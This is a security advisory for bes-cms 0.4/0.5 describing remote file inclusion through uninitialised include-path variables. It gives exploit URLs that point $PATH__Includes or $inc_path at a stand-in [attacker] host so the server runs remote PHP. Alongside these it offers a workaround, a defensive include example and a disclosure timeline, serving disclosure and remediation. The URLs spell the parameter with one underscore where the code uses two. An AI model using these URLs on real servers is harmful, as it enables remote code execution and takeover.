bes-cms is "a professional dynamic php website building tool. It was developed at mokka by a bored programmer. Bes-cms is capable of creating images galleries, message boards, news sections download sections contact sections and many more to be added on the plugin server". A vulnerability has been discovered in bes-cms that allows remote attackers to cause the script to include arbitrary PHP code (allows remote command execution).
Credit:
The information has been provided by frog-m at n.
Vulnerable systems:
* bes-cms version 0.4 rc3
* bes-cms version 0.5 rc3
Immune systems:
* bes-cms version 0.5 rc4
In the files:
* index.inc.php
* Members/index.inc.php
* Members/root/index.inc.php
We can see the following code:
    include_once($PATH__Includes."actions_default.php");
In the Include/functions_folder.php file:
    include($PATH__Includes.'functions_folder_modules.php');
    include($PATH__Includes.'functions_folder_plugins.php');
    include($PATH__Includes.'functions_folder_files.php');
In the Include/functions_hacking.php file:
switch($_GET['itemID'])
{
case 'usershow':
include_once("".$PATH__Includes."functions_user.php");
Show_USer_Details($_GET['user']);
break;
[...]
case 'send_bug':
if ($UserDetails['LOGGED_IN'] == 'YES')
{
global $PATH__Includes;
include_once("".$PATH__Includes."functions_error.php");
send_bug_report();
}
break;
[...]
case 'content_view':
global $PATH___Includes;
include_once("".$PATH__Includes."functions_message_docTypes.php");
Message_Centent_View($Plugin_Path);
break;
case 'logger':
global $PATH__Includes;
include_once("".$PATH__Includes."functions_users.php");
Loggin_Message();
break;
case 'search':
global $PATH__Includes;
include_once("".$PATH__Includes."functions_general.php");
Display_Search_Results($_POST['search_str']);
break;
[...]
In the Include/functions_message.php file:
    include($PATH__Includes.'functions_message_docTypes.php');
    include($PATH__Includes.'functions_message_edit.php');
In addition, in the Include/Start.php file:
    include_once($inc_path."Include/vars.php");
All of these files are therefore vulnerable: every include builds its path from a variable that the code never initialises ($inc_path or $PATH__Includes), so an attacker can supply its value.
Exploits:
If register_globals is set to On, any of the URLs below can be used to make the server include external files.
The following URLs will cause the server to include external files:
http://[target]/index.inc.php?PATH_Includes=http://[attacker]/
http://[target]/Members/index.inc.php?PATH_Includes=http://[attacker]/
http://[target]/Members/root/index.inc.php?PATH_Includes=http://[attacker]/
The requested file will be http://[attacker]/actions_default.php.
The following URL will cause the server to include external files:
http://[target]/Include/functions_folder.php?PATH_Includes=http://[attacker]/
The requested files will be http://[attacker]/functions_folder_modules.php, http://[attacker]/functions_folder_plugins.php and http://[attacker]/functions_folder_files.php.
The following URLs will cause the server to include external files:
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=usershow
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=logger
The requested file will be http://[attacker]/functions_user.php (for itemID=logger the code shown above includes functions_users.php instead).
The following URL will cause the server to include external files:
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=send_bug&UserDetails[LOGGED_IN]=YES
The requested file will be http://[attacker]/functions_error.php.
The following URL will cause the server to include external files:
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=content_view
The requested file will be http://[attacker]/functions_message_docTypes.php.
The following URL will cause the server to include external files:
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=search
The requested file will be http://[attacker]/functions_general.php.
The following URL will cause the server to include external files:
http://[target]/Include/functions_message.php?PATH_Includes=http://[attacker]/
The requested files will be http://[attacker]/functions_message_docTypes.php and http://[attacker]/functions_message_edit.php.
The following URL will cause the server to include external files:
http://[target]/Include/Start.php?inc_path=http://[attacker]/
The requested file will be http://[attacker]/Include/vars.php.
Solution:
The creator was notified, and has created an immune version (version 0.5 rc4).
Workaround:
In index.inc.php, Members/index.inc.php, Members/root/index.inc.php, Include/functions_folder.php, Include/functions_hacking.php and Include/functions_message.php, add the following as the first line of PHP code (inside the opening <?php tag; the parameter name must match the variable the includes use exactly, $PATH__Includes with two underscores):
if (isset($_REQUEST["PATH__Includes"])){ die("Patched by phpSecure.info"); }
And at the beginning of the Include/Start.php file, add the following as the first line of PHP code:
if (isset($_REQUEST["inc_path"])){ die("Patched by phpSecure.info"); }
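As an added example (not bes-cms code and not part of the original advisory), the following shows the defensive form of the include pattern quoted above: the script assigns the include base itself, so a value injected through register_globals is overwritten before any include runs, and every include is limited to a fixed list of names under a directory derived from the script's own location. The file and directory names are the ones listed in this advisory; the constant BES_INCLUDE_DIR and the functions bes_include and bes_dispatch are assumptions, and the file is assumed to sit in the web root next to Include/.

```php
<?php
// Added example, not bes-cms code. It replaces the vulnerable pattern
//     include($PATH__Includes . 'functions_folder_modules.php');
// where $PATH__Includes is never assigned by the script and can therefore be
// supplied by the client when register_globals is On.
//
// Assumptions (not from the advisory): this file lives in the web root next to
// the Include/ directory; BES_INCLUDE_DIR, bes_include and bes_dispatch are
// hypothetical names.

// 1. The include base is derived from this file's own location. A constant
//    cannot be overwritten by register_globals or by any request variable.
define('BES_INCLUDE_DIR', dirname(__FILE__) . DIRECTORY_SEPARATOR . 'Include' . DIRECTORY_SEPARATOR);

// 2. The variables the rest of the code base reads are assigned here, before
//    any include. Assigning them overrides whatever register_globals injected,
//    so legacy include($PATH__Includes ...) lines elsewhere stay local.
$PATH__Includes = BES_INCLUDE_DIR;
$inc_path       = dirname(__FILE__) . DIRECTORY_SEPARATOR;

// 3. Only a fixed list of include names is accepted, and the resolved path must
//    still lie inside BES_INCLUDE_DIR after symlinks and ".." are removed.
//    Returns true when the file was included, false when the name was rejected.
function bes_include($name)
{
    static $allowed = array(
        'actions_default.php',
        'functions_folder_modules.php',
        'functions_folder_plugins.php',
        'functions_folder_files.php',
        'functions_user.php',
        'functions_users.php',
        'functions_error.php',
        'functions_message_docTypes.php',
        'functions_message_edit.php',
        'functions_general.php',
        'vars.php',
    );
    if (!in_array($name, $allowed, true)) {
        return false;
    }
    $base = realpath(BES_INCLUDE_DIR);
    $real = realpath(BES_INCLUDE_DIR . $name);
    // realpath() returns false for a missing file or a URL, so a remote
    // "http://..." base can never reach include_once.
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    include_once $real;
    return true;
}

// 4. The itemID dispatcher keeps its switch: the file name is chosen by the
//    code, never by the request, and an unknown itemID includes nothing.
function bes_dispatch($itemID)
{
    switch ($itemID) {
        case 'usershow':
            return bes_include('functions_user.php');
        case 'logger':
            return bes_include('functions_users.php');
        case 'search':
            return bes_include('functions_general.php');
        default:
            return false;
    }
}

// Usage: the entry script calls bes_include() for its fixed includes and
// bes_dispatch() for the request-selected action.
bes_include('actions_default.php');
bes_dispatch(isset($_GET['itemID']) ? $_GET['itemID'] : '');
```

Turning register_globals off and disabling allow_url_fopen (and, on PHP versions that have it, allow_url_include) in php.ini are worthwhile extra layers: they stop the remote form of the attack outright, but they do not by themselves prevent an unguarded include from being pointed at a local file, which is why the path check above remains the primary fix.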
Disclosure timeline:
13/12/2003 Vulnerability discovered
14/12/2003 Vendor notified
15/12/2003 Vendor response
15/12/2003 Security Corporation clients notified
15/12/2003 Started e-mail discussions
20/12/2003 Last e-mail received
20/12/2003 Public disclosure